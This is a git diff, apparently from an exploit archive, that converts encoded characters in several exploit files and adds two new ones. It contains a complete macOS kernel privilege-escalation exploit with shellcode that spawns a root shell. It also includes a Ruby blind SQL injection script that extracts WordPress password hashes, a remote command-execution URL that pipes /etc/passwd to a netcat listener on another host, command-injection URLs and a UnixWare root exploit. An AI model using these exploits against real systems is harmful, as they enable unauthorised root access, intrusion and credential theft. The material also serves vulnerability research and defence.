'fm_form_ajax_func'); [...] -Line 44: $result =3D $_POST; +Line 44: $result = $_POST; [...] -Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms -where form_id=3D"'.*$result['fm_form_id']*.'";'); +Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms +where form_id="'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept @@ -52,19 +52,19 @@ X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] -form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and -"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F +form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and +"a"="a&action=fm_form&fm_form_referer=%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the -formulary with fm_form_id=3D"1" and the JSON message received will be simil= +formulary with fm_form_id="1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* -","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= +","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} @@ -72,11 +72,11 @@ The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* -","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= +","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} -If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= +If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message diff --git a/platforms/osx/local/39675.c b/platforms/osx/local/39675.c new file mode 100755 index 000000000..4de293aa7 --- /dev/null +++ b/platforms/osx/local/39675.c @@ -0,0 +1,544 @@ +/* + +░▀█▀░█▀█░█░░░█▀█░█▀▀░░░█░█░█░█░█░░░█▀█░█▀▄░█▀▀░█░█░ +░░█░░█▀█░█░░░█░█░▀▀█░░░▀▄▀░█░█░█░░░█░█░█░█░█▀▀░▀▄▀░ +░░▀░░▀░▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀░▀▀▀░▀░▀░▀▀░░▀▀▀░░▀░░ + T A L O S V U L N D E V + +Proof-of-Concept Exploit +Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/ +Snort rules: 37517, 37518 +CVE-2016-1743 + +Author: Piotr Bania, Cisco Talos +Target: Apple Intel HD 3000 Graphics driver +Impact: Local Privilege Escalation (root) + +Tested Configuration: +Apple Intel HD 3000 Graphics driver 10.0.0 +Darwin Kernel Version 15.2.0 +OSX 10.11.2 + +Compilation: +gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3 + +kudos: +qwertyoruiop (i've grabbed the lsym thing from you) + + +technical information (AppleIntelHD3000Graphics driver 10.0.0) : +... +__text:000000000001AA4E mov ecx, [rcx] +__text:000000000001AA50 add ecx, ecx +__text:000000000001AA52 sub eax, ecx +__text:000000000001AA54 cmp rbx, rax +__text:000000000001AA57 ja loc_1AC8C +__text:000000000001AA5D mov [rbp+var_54], esi +__text:000000000001AA60 mov rax, [rdi] +__text:000000000001AA63 mov esi, 168h +__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS # + + +Expected output: + +mac-mini:bug mini$ uname -a +Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64 + +mac-mini:bug mini$ ./TALOS-2016-0088_poc +---------------------------------------------------------------- +APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 +by Piotr Bania / CISCO TALOS +---------------------------------------------------------------- + + +Alloc: deallocating! +Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes +Alloc: vm_allocate ok, now vm_protect ... +Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling +Mapping the kernel +MapKernel: kernel mapped +Initializing service +InitService: Trying: Gen6Accelerator +InitService: service ok! +Commencing stage 1 +Stage1: Copying the stage1 payload 0x00001000 - 0x00001071 +Stage1: Setting up the RIP to 0x00001000 +Stage1: Copying trigger data +Stage1: Making stage1 call +Stage1: leaked kernel address 0xffffff8021e00000 +Stage1: kernel address leaked, success! +ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000) +ResolveApi: _current_proc = 0xffffff8022437a60 +ResolveApi: _proc_ucred = 0xffffff80223a9af0 +ResolveApi: _posix_cred_get = 0xffffff802237e780 +ResolveApi: _chgproccnt = 0xffffff80223a8400 +Commencing stage 2 +Stage2: preparing the stage2 payload +Stage2: Copying the stage2 payload 0x00001000 - 0x00001071 +Stage2: Setting up the RIP to 0x00001000 +Stage2: Copying trigger data +Stage2: Making stage2 call +Stage2: success, got root! +Stage2: now executing shell +sh-3.2# whoami +root +sh-3.2# + +*/ + + +#include "import.h" + +/** + + defines + +**/ + +#define MEM_SIZE 0x2000 +#define PAYLOAD_MEM_START 0x1000 +#define INIT_SIG 0x0210010100000008 +#define OFFSET_PAYLOAD_EXEC 0x980 +#define OFFSET_ROOM 64 + +#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr + + +/** + + stage 1 payload - get kernel address and put it to 0x1000 + + ; memory space for kernel address + + nop + nop + nop + nop + nop + nop + nop + nop + + save_regs64 + + + ; get msr entry + mov rcx, 0C0000082h ; lstar + rdmsr ; MSR[ecx] --> edx:eax + shl rdx, 32 + or rax, rdx + + ; find kernel addr - scan backwards +MAX_KERNEL_SCAN_SIZE equ 10000h +KERNEL_SIG equ 01000007FEEDFACFh +PAGE_SIZE equ 1000h + + + mov rcx, MAX_KERNEL_SCAN_SIZE + and rax, not 0FFFFFh + xor rdx, rdx + mov r8, KERNEL_SIG + + +scan_loop: + sub rax, PAGE_SIZE + dec rcx + jz scan_done + + ; is sig correct? + cmp qword [rax], r8 + jnz scan_loop + + mov rdx, rax + +scan_done: + + ; store the addr - rdx kernel addr, 0 if not found + lea rcx, [shell_start] + mov qword [rcx], rdx + + load_regs64 + + xor rax, rax + xor r15, r15 + + ret + + + +**/ + +unsigned char stage1[113] = { + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, + 0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32, + 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25, + 0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00, + 0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75, + 0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F, + 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, + 0xC3 +}; + + +/** + + stage 2 payload - escalate + + jmp over_api_table + + + api_current_proc dq 0 + api_proc_ucred dq 0 + api_posix_cred_get dq 0 + api_chgproccnt dq 0 + + + + over_api_table: + save_regs64 + + mov rax, qword [api_current_proc] + call rax + mov rdi, rax ; rdi = cur_proc + + + ; system v abi - rdi first arg + mov rax, qword [api_proc_ucred] + call rax + + + ; rax = cur_ucred + mov rdi, rax + mov rax, qword [api_posix_cred_get] + call rax + + ; rax = pcred + mov dword [rax], 0 + mov dword [rax+8], 0 + + load_regs64 + + xor rax, rax + xor r15, r15 + + ret + +**/ + + +#define OFF_API_START 2 +#define OFF_API_CURRENT_PROC OFF_API_START +#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8 +#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8 +#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example + + +unsigned char stage2[111] = { + 0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B, + 0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF, + 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7, + 0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, + 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3 +}; + + + +/** + + globals + +**/ + +uint64_t mem; +io_connect_t conn; + +uint64_t KernelAddr = 0; +lsym_map_t* MappingKernel = 0; + +uint64_t api_current_proc = 0; +uint64_t api_proc_ucred = 0; +uint64_t api_posix_cred_get = 0; +uint64_t api_chgproccnt = 0; + + + + +/** + + functions + +**/ + + + +uint64_t Alloc(uint32_t addr, uint32_t sz) +{ + mach_error_t k_error; + + printf("Alloc: deallocating! \n"); + vm_deallocate(mach_task_self(), (vm_address_t) addr, sz); + + printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz); + k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0); + + if (k_error != KERN_SUCCESS) + { + printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error); + exit(-1); + } + + + printf("Alloc: vm_allocate ok, now vm_protect ...\n"); + + k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx + + if (k_error != KERN_SUCCESS) + { + printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error); + exit(-1); + } + + printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr); + + while(sz--) *(char*)(addr+sz)=0; + return addr; +} + + +int MapKernel(void) +{ + + MappingKernel = lsym_map_file("/mach_kernel"); + if (!MappingKernel || !MappingKernel->map) + { + MappingKernel = lsym_map_file("/System/Library/Kernels/kernel"); + } + + if (!MappingKernel || !MappingKernel->map) + { + printf("MapKernel: unable to map kernel, quiting \n"); + return -1; + } + + + printf("MapKernel: kernel mapped \n"); + return 1; +} + + + +int ResolveApi(void) +{ + + + uint64_t base = lsym_kernel_base(MappingKernel); + + api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc"); + api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred"); + api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get"); + api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt"); + + printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base); + printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc); + printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred); + printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get); + printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt); + + return 1; + +} + + + + +int InitService(char *IoServiceName) +{ + int type; + io_service_t service; + CFMutableDictionaryRef matching; + io_iterator_t iterator; + + printf("InitService: Trying: %s \n", IoServiceName); + + matching = IOServiceMatching(IoServiceName); + + if( !matching) + { + printf("Initservice: IOServiceMatching() failed \n"); + return -1; + } + + if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS) + { + printf("InitService: IOServiceGetMatchingServices failed \n"); + return -1; + } + + + service = IOIteratorNext(iterator); + if (service == IO_OBJECT_NULL) + { + printf("InitService: IOIteratorNext failed \n"); + return -1; + } + + + type = 0; + conn = MACH_PORT_NULL; + if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS) + { + printf("InitService: IOServiceOpen failed! \n"); + return -1; + } + + printf("InitService: service ok! \n"); + return 1; +} + + + +int Stage1(void) +{ + unsigned char *p; + unsigned char *p_ptr; + + kern_return_t k_error; + + char UselessStruct[4096]; + size_t UselessStructSize = 0x14; + + + p = (unsigned char*)mem; + p_ptr = p + OFFSET_ROOM; + + + + printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1)); + memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1)); + + printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START); + *(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START; + + + printf("Stage1: Copying trigger data \n"); + *(uint64_t*)p_ptr = INIT_SIG; + + printf("Stage1: Making stage1 call\n"); + k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize); + + KernelAddr = *(uint64_t*)PAYLOAD_MEM_START; + printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr); + + if ((KernelAddr == 0) || (KernelAddr == 0x90909090)) + { + printf("Stage1: fatal kernel address is wrong, exiting \n"); + return -1; + } + + printf("Stage1: kernel address leaked, success! \n"); + return 1; +} + + +int Stage2(void) +{ + int i; + unsigned char *p; + unsigned char *p_ptr; + + kern_return_t k_error; + + char UselessStruct[4096]; + size_t UselessStructSize = 0x14; + + + p = (unsigned char*)mem; + p_ptr = p + OFFSET_ROOM; + + + printf("Stage2: preparing the stage2 payload \n"); + + unsigned char *t = (unsigned char*)&stage2; + *(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc; + *(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred; + *(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get; + *(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt; + + + printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1)); + memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2)); + + printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START); + *(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START; + + + printf("Stage2: Copying trigger data \n"); + *(uint64_t*)p_ptr = INIT_SIG; + + + printf("Stage2: Making stage2 call\n"); + k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize); + + + setuid(0); + if (getuid() == 0) + { + + printf("Stage2: success, got root! \n"); + printf("Stage2: now executing shell \n"); + + system("/bin/sh"); + exit(0); + } + + + printf("Stage2: failed! \n"); + return -1; + +} + + + + +int main(void) +{ + printf(" ---------------------------------------------------------------- \n"); + printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n"); + printf(" by Piotr Bania / CISCO TALOS \n"); + printf(" ---------------------------------------------------------------- \n\n\n"); + + + IOServiceClose(0); + IOServiceOpen(0, 0, 0, 0); + + // if this fails and we are done + mem = Alloc(0, MEM_SIZE); + + + printf("Mapping the kernel \n"); + + if (MapKernel() == -1) + return -1; + + printf("Initializing service \n"); + + if (InitService("Gen6Accelerator") == -1) + return -1; + + printf("Commencing stage 1 \n"); + + if (Stage1() == -1) + return -1; + + if (ResolveApi() == -1) + return -1; + + printf("Commencing stage 2 \n"); + + Stage2(); + + + return 1; +} \ No newline at end of file diff --git a/platforms/php/webapps/23798.txt b/platforms/php/webapps/23798.txt index 46c4e6662..5700b6aca 100755 --- a/platforms/php/webapps/23798.txt +++ b/platforms/php/webapps/23798.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9831/info The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility. ; /bin/cat location_of_Confixx_config_file -http://www.example.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd \ No newline at end of file +http://www.example.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/24868.rb b/platforms/php/webapps/24868.rb index aa4c6ec6b..d7a0560ed 100755 --- a/platforms/php/webapps/24868.rb +++ b/platforms/php/webapps/24868.rb @@ -5,15 +5,14 @@ # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 -# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc= -h (cli) +# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) ############## # Description: ############## # The "order" and "orderby" parameter is vulnerable for SQL Injection -# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din= -ic_faq&orderby=3D +# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=in= +ic_faq&orderby= # PoC take some time to finish (15min on my Testsystem). # I could speed it up with Multithreading but I'm to lazy right now @@ -22,22 +21,22 @@ ic_faq&orderby=3D ################################### # # function prepare_items() { -# $this->_column_headers =3D array($this->_columns, $this->_hidden_columns= +# $this->_column_headers = array($this->_columns, $this->_hidden_columns= , $this->_sortable_columns); -# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC"; -# $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= +# $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC"; +# $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= ']} {$sort_order}" : false; # # global $wpdb; # if (is_array($this->_sql)) { -# if ($orderby_column =3D=3D false) { -# $data =3D $this->_sql; +# if ($orderby_column == false) { +# $data = $this->_sql; # } else { -# $data =3D $this->_sql; +# $data = $this->_sql; # usort($data, array(&$this, 'usort_reorder')); # } # } else { -# $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= +# $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= ); # } ###########################################################################= @@ -51,47 +50,47 @@ ic_faq&orderby=3D require "net/http" require "uri" -$target =3D "" # EDIT ME # -$cookie =3D "" # EDIT ME # authenticated user session +$target = "" # EDIT ME # +$cookie = "" # EDIT ME # authenticated user session # Example: -#$target =3D "http://127.0.0.1:9001/wordpress/" -#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405= -45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se= -ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= -=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau= -er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs= -ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5= -d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91= -694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= -=3D1" +#$target = "http://127.0.0.1:9001/wordpress/" +#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C13640405= +45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-se= +ttings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= +=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bau= +er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fs= +ucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5= +d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91= +694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= +=1" if $target.eql?("") or $cookie.eql?("") puts "\n[!]\tPlease set $target and $cookie variable\n" raise end -$chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a -$hash =3D "$P$" -$i =3D 0 # chars index -$j =3D 4 # hash index +$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a +$hash = "$P$" +$i = 0 # chars index +$j = 4 # hash index def sqli_send() - sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$= -j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= + sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$= +j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*= (SELECT table_name FROM information_schema.tables)END) --") - uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby= -=3D#{sqli}") - http =3D Net::HTTP.new(uri.host, uri.port) + uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby= +=#{sqli}") + http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stderr) - request =3D Net::HTTP::Get.new(uri.request_uri) - request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= + request = Net::HTTP::Get.new(uri.request_uri) + request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= rv:19.0) Gecko/20100101 Firefox/19.0" - request["Cookie"] =3D $cookie - resp =3D http.request(request) - if( resp.code !=3D "200" ) - puts "something is wrong response =3D #{resp.code}" + request["Cookie"] = $cookie + resp = http.request(request) + if( resp.code != "200" ) + puts "something is wrong response = #{resp.code}" raise end # In WordPress default settings there will no SQL error displayed @@ -101,17 +100,17 @@ j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= end def print_status() - output =3D "HASH: #{$hash} try #{$chars[$i]}" + output = "HASH: #{$hash} try #{$chars[$i]}" print "\b"*output.length + output end while( $hash.length < 34 ) if( !sqli_send() ) - $hash +=3D $chars[$i] - $j +=3D 1 - $i =3D 0 + $hash += $chars[$i] + $j += 1 + $i = 0 else - $i +=3D 1 + $i += 1 end print_status() end diff --git a/platforms/php/webapps/26866.txt b/platforms/php/webapps/26866.txt index 593046e77..abcb4c687 100755 --- a/platforms/php/webapps/26866.txt +++ b/platforms/php/webapps/26866.txt @@ -4,7 +4,7 @@ Round Cube will reportedly reveal its installation path in an error message outp Requesting this link: -http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=3Dma%60il +http://xxxx.com/roundcube/?_auth=cf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=ma%60il Caused this error message: diff --git a/platforms/php/webapps/39676.txt b/platforms/php/webapps/39676.txt new file mode 100755 index 000000000..7bcc3aca3 --- /dev/null +++ b/platforms/php/webapps/39676.txt @@ -0,0 +1,138 @@ +[+] Credits: hyp3rlinx + +[+] Website: http://hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt + + +Vendor: +============ +www.op5.com + + +Product: +=========== +op5 v7.1.9 + +op5 Monitor is a software product for server, Network monitoring and +management based on the open source Project Nagios. + + +Vulnerability Type: +======================== +Remote Command Execution + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +op5 has a CSRF entry point that can be used to execute arbitrary remote +commands on op5 system sent via HTTP GET requests, allowing attackers +to completely takeover the affected host, to be victimized a user must be +authenticated and visit a malicious webpage or click an infected link... + +Reference: +https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/ + + +Exploit code(s): +=============== + +trivial RCE cat /etc/passwd... using netcat + +nc.exe -vvlp 5555 > passwds.txt + +https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%205555 + + + +result: + +listening on [any] 5555 ... +192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA +connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT + sent 0, rcvd 1343 + +C:\netcat-win32-1.12>type passwds.txt +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +abrt:x:173:173::/etc/abrt:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +smstools:x:499:499::/var/lib/smstools:/bin/bash +postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash +op5lsu:x:500:500::/home/op5lsu:/bin/bash +saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin +postfix:x:89:89::/var/spool/postfix:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +monitor:x:299:48::/opt/monitor:/bin/bash +ntp:x:38:38::/etc/ntp:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +tcpdump:x:72:72::/:/sbin/nologin + + + +Disclosure Timeline: +============================================ +Vendor Notification: March 27, 2016 +Vendor confirms vulnerability March 27, 2016 +Vendor issue patched new release v7.2.0 April 5, 2016 +April 6, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: +================================================================= + + +Request Method(s): [+] GET + + +Vulnerable Product: [+] op5 v7.1.9 + + +Vulnerable Parameter(s): [+] 'cmd_str' + +================================================================= + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/sco/local/19654.pl b/platforms/sco/local/19654.pl index 489554b2d..7a4c75315 100755 --- a/platforms/sco/local/19654.pl +++ b/platforms/sco/local/19654.pl @@ -33,21 +33,21 @@ ed # ########################################################### -$ui_source =3D "/home/xnec/ui.c"; -$ui_dest =3D "/home/xnec/ui"; -$ui_code =3D "void main() { setreuid(0,0); system(\"/bin/ksh\");}"; -$privloc =3D "/etc/security/tcb/privs"; -$uidatafile=3D"/tmp/uidata"; -$sumpath =3D "/usr/bin/sum"; -$uidata_sym =3D "/tmp/uidata.tmp"; -$compiler =3D "cc"; -$uidadmin =3D "/usr/bin/uidadmin"; +$ui_source = "/home/xnec/ui.c"; +$ui_dest = "/home/xnec/ui"; +$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}"; +$privloc = "/etc/security/tcb/privs"; +$uidatafile="/tmp/uidata"; +$sumpath = "/usr/bin/sum"; +$uidata_sym = "/tmp/uidata.tmp"; +$compiler = "cc"; +$uidadmin = "/usr/bin/uidadmin"; ### # Path to the directory where your $uidata_sym will exist relative to # /etc/uidata/ ### -$uidadminarg =3D "../../tmp"; +$uidadminarg = "../../tmp"; print("\n* uidadmin exploit for UnixWare 7.1 \n\n"); @@ -69,20 +69,20 @@ if ( -e $ui_dest ) { # stat $ui_dest for size in bytes and ctime (seconds since epoch) ### -$size=3D(stat($ui_dest))[7] || die "cannot stat $ui_dest"; -$ctime=3D(stat($ui_dest))[10]; -print("$ui_dest size=3D$size ctime=3D$ctime\n"); 